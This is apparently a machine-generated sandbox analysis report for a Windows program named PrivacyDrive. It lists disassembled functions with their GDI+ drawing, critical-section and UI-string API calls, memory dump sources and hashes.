                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E3C1
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0041E436
                                • GdipGetFontHeightGivenDPI.GDIPLUS(?,?,00000000), ref: 0041E4BF
                                • GdipGetFontHeightGivenDPI.GDIPLUS(?,?,00000000), ref: 0041E4F9
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041E529
                                • GdipDeleteStringFormat.GDIPLUS(?,?,00000000), ref: 0041E538
                                • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0041E54A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFontFormatGivenHeightMeasure$FromGraphicsRelease
                                • String ID:
                                • API String ID: 2359815219-0
                                • Opcode ID: 585e7a93bd58001904740ac3a91bdceba3dfd91d643e846050f90aceca192211
                                • Instruction ID: 09d8ae3e237c4575dbacd8db9b975f17c591a55f032f9cd3dc16601ab6b94f48
                                • Opcode Fuzzy Hash: 585e7a93bd58001904740ac3a91bdceba3dfd91d643e846050f90aceca192211
                                • Instruction Fuzzy Hash: B88166B1508301EFD311CF25C844B5ABBE4FF99714F104B1DF995A62A0E771A888DF92
                                Function 00419760 Relevance: 15.2, APIs: 10, Instructions: 176COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS ref: 00419802
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041981D
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000000), ref: 00419836
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041984F
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 0041986B
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004198AE
                                • GdipCreateSolidFill.GDIPLUS(FF414141,7563D392,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004198ED
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,00000000,?,7563D392,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 00419970
                                • GdipDeleteBrush.GDIPLUS(7563D392,?,?,?,?,00000000,?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004199D1
                                • GdipDeleteStringFormat.GDIPLUS(?,?,?,?,?,00000000,?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004199E6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$AlignCreateDelete$BrushDrawFillFlagsLineMeasureSolidTrimming
                                • String ID:
                                • API String ID: 3860206108-0
                                • Opcode ID: 72c8353d38246cf214f3c896df47ffc54ca75d197caa8221dc247120b4e1eade
                                • Instruction ID: 82aa97e7e2b9b2b851f263c426e3dbaf2b95d9476accf6596981ef5f21f49aac
                                • Opcode Fuzzy Hash: 72c8353d38246cf214f3c896df47ffc54ca75d197caa8221dc247120b4e1eade
                                • Instruction Fuzzy Hash: 2B7164B1618341AFE315CF25C894B1BBBF4FF99354F104A1DF895A22A0E770E888DB52
                                Function 004A37E0 Relevance: 15.2, APIs: 10, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004A3818
                                • GdipCreateFromHDC.GDIPLUS(00000000,00549710,?,?,?,?,?,?,?,?,?,?,?,?,-00000064), ref: 004A3837
                                • GdipCreateStringFormat.GDIPLUS(00000000), ref: 004A389F
                                • SystemParametersInfoW.USER32(00000030,00000000,-00000064,00000000), ref: 004A38C4
                                • GdipSetTextRenderingHint.GDIPLUS(000000FF,00000005), ref: 004A38ED
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000000), ref: 004A3900
                                • GdipMeasureString.GDIPLUS(000000FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004A394A
                                • ReleaseDC.USER32(00000000,-00000064), ref: 004A3988
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004A3995
                                • GdipDeleteGraphics.GDIPLUS(000000FF), ref: 004A39A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintInfoMeasureParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 1209069038-0
                                • Opcode ID: e13e9a6b74bf522df359b8afa5e44bdf5ab1eabf9894cdebf30e4b9570834280
                                • Instruction ID: 1d3a1b7f377fb260887c64f343e449651bc82d9dc617161939b0125236653fd0
                                • Opcode Fuzzy Hash: e13e9a6b74bf522df359b8afa5e44bdf5ab1eabf9894cdebf30e4b9570834280
                                • Instruction Fuzzy Hash: 3851F272A00308EFDB10CFA8D858B9EBBB4FF59715F104219E805BB290E7B56949DB50
                                Function 004710E0 Relevance: 15.1, APIs: 10, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00470FC0
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00470FD8
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,00000138,HYPERLINK,?,00000000,00000000,00471119,7563D392,?,?,00000000), ref: 00471005
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471017
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,00000118,HYPERLINK,?,00000000,00000000,00471119,7563D392,?,?,00000000), ref: 00471044
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471056
                                • GetDC.USER32(00000000), ref: 0047112C
                                • GdipCreateFromHDC.GDIPLUS(00000000,004265D4,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471149
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000000,?,?,00000000), ref: 00471193
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,?,00000000), ref: 004711A3
                                • GdipMeasureString.GDIPLUS(00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 004711D8
                                • ReleaseDC.USER32(00000000,00000000), ref: 004711EB
                                • GdipDeleteStringFormat.GDIPLUS(00000000,00000001,?,?,?,00000000,00000000,00000001,00000001,00000001,?,?,00000000), ref: 00471250
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,?,00000000), ref: 0047125E
                                • GdipDeleteStringFormat.GDIPLUS(00000000,00000001,?,?,?,00000000,00000000,00000001,00000001,00000001,?,?,00000000), ref: 00471284
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,?,00000000), ref: 00471292
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CriticalSection$DeleteString$EnterFormatLeave$CreateGraphics$FromHintMeasureReleaseRenderingText
                                • String ID:
                                • API String ID: 1338920557-0
                                • Opcode ID: d95156ea57c9d7808e110d15ca985729e7fac2c7c35a35337629e3649b75d5a8
                                • Instruction ID: 4db55db421839a4f1f7ea1671b78e7f67187b6ba5581c9a9af02339a1d8ca7ab
                                • Opcode Fuzzy Hash: d95156ea57c9d7808e110d15ca985729e7fac2c7c35a35337629e3649b75d5a8
                                • Instruction Fuzzy Hash: 77517A71A00209EFDB11CFA8DC59BEEBBB4FB19314F10821AF915B62A0E7759904DB60
                                Function 0041A670 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A680
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A698
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,TitleBar,?,DRIVE_LIST,?,?,?,0041A57C), ref: 0041A6C5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A6D7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,TitleBar,?,DRIVE_LIST,?,?,?,0041A57C), ref: 0041A704
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A716
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$DRIVE_LIST$TitleBar
                                • API String ID: 904232820-887086326
                                • Opcode ID: fb6bee19645a3d5686921632b893275be9081d7dd99eb4585fd1bc1993618d7e
                                • Instruction ID: 79ea068261a043cbfaa6fc1e4640479fbfa165a81fd4abad349106ecbc512596
                                • Opcode Fuzzy Hash: fb6bee19645a3d5686921632b893275be9081d7dd99eb4585fd1bc1993618d7e
                                • Instruction Fuzzy Hash: B0216074382302ABD664A775DD82FE77BA4BF10745F04042EBA59D31C0FAA4F845C726
                                Function 00450130 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,?,?,00450438,7563D392,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450140
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450158
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTER,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450185
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450197
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTER,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 004501C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 004501D2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PM_HEIGHT$PM_WIDTH$REGISTER
                                • API String ID: 904232820-2885144559
                                • Opcode ID: 1232f653f064cc69b446d0000a521427d6d026b350b09f417f6c11c5db8e2fc4
                                • Instruction ID: 1795d43d4a07bf36addd6cc27d5771d0a641f7eb05ceb74cf415dbd9cb5915ab
                                • Opcode Fuzzy Hash: 1232f653f064cc69b446d0000a521427d6d026b350b09f417f6c11c5db8e2fc4
                                • Instruction Fuzzy Hash: 8D216274385706ABD610E7B69C96FA66BE8FB54706F04042EB649D32C1EEE4F804DB24
                                Function 00415540 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 00415550
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 00415568
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD,?,?,?,004026D0,7563D392), ref: 00415595
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 004155A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD,?,?,?,004026D0,7563D392), ref: 004155D0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 004155E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PASSWORD$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-3657400423
                                • Opcode ID: 3925b9ec2e7c7eb30c46bdd1711993fd484669aaaedef7c9b298f213384a2b00
                                • Instruction ID: 89e29c91ffdbc22f58892ef3380fc42036552decf4919217867b5359a2a5851f
                                • Opcode Fuzzy Hash: 3925b9ec2e7c7eb30c46bdd1711993fd484669aaaedef7c9b298f213384a2b00
                                • Instruction Fuzzy Hash: 27218470384706ABDA10E7768E96FE2ABE4BB50706F40042AB64DD32D0EEF4F805C765
                                Function 00406600 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00406610
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00406628
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00406655
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00406667
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00406690
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004066A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_KEY_FILE$Dialog$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-3629064023
                                • Opcode ID: 0434f81e81c725c262128711de64b71d0b08566e8f60fb831b876a1d675a260b
                                • Instruction ID: b3a5dc42ddd407f53cb05a4efa2dc0af8bb578841b7104e5456df8250465188e
                                • Opcode Fuzzy Hash: 0434f81e81c725c262128711de64b71d0b08566e8f60fb831b876a1d675a260b
                                • Instruction Fuzzy Hash: 152150703847026BDA50E776CD96FA26BE8BB00B46F04043EB689D32D1EEE4B800C725
                                Function 00452AC0 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452AD0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452AE8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B15
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B27
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B50
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$HEIGHT$SETTINGS$WIDTH
                                • API String ID: 904232820-2107324581
                                • Opcode ID: 2a7a4683f37bf8fb05f1c399d6050ef2a62edfb5a27c99c38a995285cc8654e9
                                • Instruction ID: 1a1b8663d487c9b13af43dc03755f6a51117a3199646d30a022d9ead9a936584
                                • Opcode Fuzzy Hash: 2a7a4683f37bf8fb05f1c399d6050ef2a62edfb5a27c99c38a995285cc8654e9
                                • Instruction Fuzzy Hash: 1F21A130384705ABDA50EB769C96FA2ABE4BB54706F00442FBA49D72D1EEE4F904C724
                                Function 004331B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000000,7563D392), ref: 004331E9
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipSetSmoothingMode.GDIPLUS(?,00000002,?,0000000E,00000014,000000FF,?,00000041,00000017,?,00000064,?,FF414141), ref: 0043329C
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 004332B3
                                • GdipSetSmoothingMode.GDIPLUS(?,00000003,?,00000000,0000009B,?,?,FF414141), ref: 004333D3
                                • GdipDrawImage.GDIPLUS(?,00000000,?,?,?,?,?,FF800000,&1C), ref: 0043344C
                                • GdipDrawImage.GDIPLUS(?,00000000,?,?,?,?,?,?,?,FF800000,&1C), ref: 00433495
                                • GdipDeleteStringFormat.GDIPLUS(?,?,?,?,?,?,?,?,FF800000,&1C), ref: 004334AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
